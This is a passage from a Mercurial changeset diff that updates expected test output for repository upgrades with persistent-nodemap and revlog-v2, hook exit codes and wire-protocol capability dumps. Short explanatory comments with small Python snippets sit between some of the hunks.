Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server.
+ persistent-nodemap (rust !)
+ Speedup revision lookup by node id. (rust !)
+ (rust !)
processed revlogs:
- all-filelogs
- changelog
@@ -404,7 +435,8 @@
$ hg debugupgraderepo --quiet
requirements
preserved: revlogv1, store
- added: dotencode, fncache, generaldelta, sparserevlog
+ added: dotencode, fncache, generaldelta, sparserevlog (no-rust !)
+ added: dotencode, fncache, generaldelta, persistent-nodemap, sparserevlog (rust !)
processed revlogs:
- all-filelogs
@@ -424,6 +456,9 @@
sparserevlog
in order to limit disk reading and memory usage on older version, the span of a delta chain from its root to its end is limited, whatever the relevant data in this span. This can severly limit Mercurial ability to build good chain of delta resulting is much more storage space being taken and limit reusability of on disk delta during exchange.
+ persistent-nodemap (rust !)
+ persist the node -> rev mapping on disk to speedup lookup (rust !)
+ (rust !)
repository lacks features used by the default config options:
dotencode
@@ -434,7 +469,8 @@
requirements
preserved: revlogv1, store
- added: fncache, generaldelta, sparserevlog
+ added: fncache, generaldelta, sparserevlog (no-rust !)
+ added: fncache, generaldelta, persistent-nodemap, sparserevlog (rust !)
fncache
repository will be more resilient to storing certain paths and performance of certain operations should be improved
@@ -445,6 +481,9 @@
sparserevlog
Revlog supports delta chain with more unused data between payload. These gaps will be skipped at read time. This allows for better delta chains, making a better compression and faster exchange with server.
+ persistent-nodemap (rust !)
+ Speedup revision lookup by node id. (rust !)
+ (rust !)
processed revlogs:
- all-filelogs
- changelog
@@ -503,7 +542,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, revlogv1, store
+ preserved: dotencode, fncache, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, persistent-nodemap, revlogv1, store (rust !)
added: generaldelta
generaldelta
@@ -544,6 +584,7 @@
$ cat .hg/upgradebackup.*/requires
dotencode
fncache
+ persistent-nodemap (rust !)
revlogv1
store
@@ -553,6 +594,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
store
@@ -604,7 +646,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: sparserevlog
sparserevlog
@@ -632,11 +675,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for * (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ ls -1 .hg/ | grep upgradebackup
[1]
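
The two removed lines in the swap sequence above (and in the analogous
hunks below) reflect that an in-place upgrade no longer keeps an
upgradebackup.* copy of the replaced store; the "ls -1 .hg/ | grep
upgradebackup" returning [1] confirms nothing is left behind. A
hypothetical equivalent check in Python:

    import glob

    # No upgradebackup.* directory should survive the upgrade.
    assert glob.glob('.hg/upgradebackup.*') == []
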
@@ -647,7 +688,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -679,11 +721,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
Check that the repo still works fine
@@ -726,7 +766,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -759,11 +800,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -778,7 +817,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -810,11 +850,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -829,7 +867,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-parent
@@ -861,11 +900,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -884,7 +921,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
removed: sparserevlog
optimisations: re-delta-parent
@@ -919,11 +957,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -940,7 +976,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: sparserevlog
optimisations: re-delta-parent
@@ -978,11 +1015,9 @@
data fully upgraded in a temporary repository
marking source repository as being upgraded; clients will be unable to read from repository
starting in-place swap of repository data
- replaced files will be backed up at $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
replacing store...
store replacement complete; repository was inconsistent for *s (glob)
finalizing requirements file and making repository readable again
- removing old repository content $TESTTMP/upgradegd/.hg/upgradebackup.* (glob)
removing temporary repository $TESTTMP/upgradegd/.hg/upgrade.* (glob)
$ hg verify
checking changesets
@@ -1007,7 +1042,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-fulladd
@@ -1070,6 +1106,7 @@
fncache
generaldelta
largefiles
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1081,6 +1118,7 @@
fncache
generaldelta
largefiles
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1158,6 +1196,7 @@
> maxchainlen = 9001
> EOF
$ hg config format
+ format.revlog-compression=$BUNDLE2_COMPRESSIONS$
format.maxchainlen=9001
$ hg debugdeltachain file
rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio readsize largestblk rddensity srchunks
@@ -1169,7 +1208,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
optimisations: re-delta-all
@@ -1229,6 +1269,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
store
@@ -1237,7 +1278,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: sparserevlog
processed revlogs:
@@ -1249,6 +1291,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1258,7 +1301,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
removed: sparserevlog
processed revlogs:
@@ -1270,6 +1314,7 @@
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
store
@@ -1284,7 +1329,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, store (rust !)
added: revlog-compression-zstd, sparserevlog
processed revlogs:
@@ -1299,16 +1345,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zstd zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zlib zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd
revlogv1
sparserevlog
@@ -1320,7 +1369,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
removed: revlog-compression-zstd
processed revlogs:
@@ -1335,16 +1385,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zlib zlib zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlogv1
sparserevlog
store
@@ -1359,7 +1412,8 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store
+ preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlogv1, sparserevlog, store (rust !)
added: revlog-compression-zstd
processed revlogs:
@@ -1374,16 +1428,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zstd zstd zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd
revlogv1
sparserevlog
@@ -1400,10 +1457,12 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, store (no-zstd !)
- preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
- added: exp-sidedata-flag (zstd !)
- added: exp-sidedata-flag, sparserevlog (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !)
+ removed: revlogv1
+ added: exp-revlogv2.2, exp-sidedata-flag (zstd !)
+ added: exp-revlogv2.2, exp-sidedata-flag, sparserevlog (no-zstd !)
processed revlogs:
- all-filelogs
@@ -1417,20 +1476,22 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes no no
plain-cl-delta: yes yes yes
compression: zlib zlib zlib (no-zstd !)
- compression: zstd zstd zlib (zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
+ exp-revlogv2.2
exp-sidedata-flag
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd (zstd !)
- revlogv1
sparserevlog
store
$ hg debugsidedata -c 0
@@ -1444,9 +1505,11 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
- preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
- removed: exp-sidedata-flag
+ preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !)
+ removed: exp-revlogv2.2, exp-sidedata-flag
+ added: revlogv1
processed revlogs:
- all-filelogs
@@ -1460,17 +1523,19 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
compression: zlib zlib zlib (no-zstd !)
- compression: zstd zstd zlib (zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd (zstd !)
revlogv1
sparserevlog
@@ -1487,9 +1552,11 @@
upgrade will perform the following actions:
requirements
- preserved: dotencode, fncache, generaldelta, revlogv1, sparserevlog, store (no-zstd !)
- preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, revlogv1, sparserevlog, store (zstd !)
- added: exp-sidedata-flag
+ preserved: dotencode, fncache, generaldelta, sparserevlog, store (no-zstd !)
+ preserved: dotencode, fncache, generaldelta, revlog-compression-zstd, sparserevlog, store (zstd no-rust !)
+ preserved: dotencode, fncache, generaldelta, persistent-nodemap, revlog-compression-zstd, sparserevlog, store (rust !)
+ removed: revlogv1
+ added: exp-revlogv2.2, exp-sidedata-flag
processed revlogs:
- all-filelogs
@@ -1503,20 +1570,22 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
compression: zlib zlib zlib (no-zstd !)
- compression: zstd zstd zlib (zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ cat .hg/requires
dotencode
+ exp-revlogv2.2
exp-sidedata-flag
fncache
generaldelta
+ persistent-nodemap (rust !)
revlog-compression-zstd (zstd !)
- revlogv1
sparserevlog
store
$ hg debugsidedata -c 0
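
Two format changes run through the whole test-upgrade-repo.t diff above.
First, the rust test variant now enables persistent-nodemap (the
debugformat tables show repo/config "yes" with default still "no"), which
adds the persistent-nodemap requirement to every `(rust !)` expectation.
Second, the experimental sidedata upgrade now switches the repository to
a revlog-v2 store: `revlogv1` is removed and `exp-revlogv2.2` is added
alongside `exp-sidedata-flag`. A small hypothetical helper matching the
"cat .hg/requires" checks above:

    # Hypothetical: read .hg/requires into a set, as the tests inspect it.
    def read_requires(repo_root):
        with open(repo_root + '/.hg/requires') as f:
            return {line.strip() for line in f if line.strip()}

    # e.g. 'persistent-nodemap' in read_requires('.') on a rust test run
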
--- a/tests/test-url-download.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-url-download.t Tue Apr 20 11:01:06 2021 -0400
@@ -34,6 +34,8 @@
$ hg debugdownload ./null.txt
1 0000000000000000000000000000000000000000
+ $ cat ../error.log
+
Test largefile URL
------------------
@@ -66,3 +68,5 @@
$ hg debugdownload "largefile://a57b57b39ee4dc3da1e03526596007f480ecdbe8"
1 0000000000000000000000000000000000000000
$ cd ..
+
+ $ cat error.log
--- a/tests/test-url.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-url.py Tue Apr 20 11:01:06 2021 -0400
@@ -275,7 +275,7 @@
def test_url():
"""
>>> from mercurial import error, pycompat
- >>> from mercurial.util import url
+ >>> from mercurial.utils.urlutil import url
>>> from mercurial.utils.stringutil import forcebytestr
This tests for edge cases in url.URL's parsing algorithm. Most of
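
The doctest import fix above tracks a module move: the url class now
lives in mercurial.utils.urlutil instead of mercurial.util. Usage is
unchanged; an illustrative snippet:

    from mercurial.utils.urlutil import url

    u = url(b'https://example.com/repo')
    # Parsed components are bytes attributes:
    assert u.scheme == b'https' and u.host == b'example.com'
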
--- a/tests/test-win32text.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-win32text.t Tue Apr 20 11:01:06 2021 -0400
@@ -38,7 +38,7 @@
transaction abort!
rollback completed
abort: pretxncommit.crlf hook failed
- [255]
+ [40]
$ mv .hg/hgrc .hg/hgrc.bak
@@ -77,7 +77,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.crlf hook failed
- [255]
+ [40]
$ mv .hg/hgrc.bak .hg/hgrc
$ echo hello > f
@@ -109,7 +109,7 @@
transaction abort!
rollback completed
abort: pretxncommit.crlf hook failed
- [255]
+ [40]
$ hg revert -a
forgetting d/f2
$ rm d/f2
@@ -286,7 +286,7 @@
transaction abort!
rollback completed
abort: pretxnchangegroup.crlf hook failed
- [255]
+ [40]
$ hg log -v
changeset: 5:f0b1c8d75fce
--- a/tests/test-wireproto-caching.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-caching.t Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,10 @@
$ . $TESTDIR/wireprotohelpers.sh
+
+persistent-nodemap is not enabled by default. It is not relevant for this test, so disable it.
+
$ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
> [extensions]
> blackbox =
> [blackbox]
--- a/tests/test-wireproto-command-capabilities.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-command-capabilities.t Tue Apr 20 11:01:06 2021 -0400
@@ -2,6 +2,13 @@
$ . $TESTDIR/wireprotohelpers.sh
+persistent-nodemap is not enabled by default. It is not relevant for this test, so disable it.
+
+ $ cat >> $HGRCPATH << EOF
+ > [format]
+ > use-persistent-nodemap = no
+ > EOF
+
$ hg init server
zstd isn't present in plain builds. Make tests easier by removing
@@ -150,7 +157,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
cbor> [
{
b'apibase': b'api/',
@@ -190,7 +197,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
cbor> [
{
b'apibase': b'api/',
@@ -223,7 +230,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
cbor> [
{
b'apibase': b'api/',
@@ -484,7 +491,7 @@
s> Content-Type: application/mercurial-cbor\r\n
s> Content-Length: *\r\n (glob)
s> \r\n
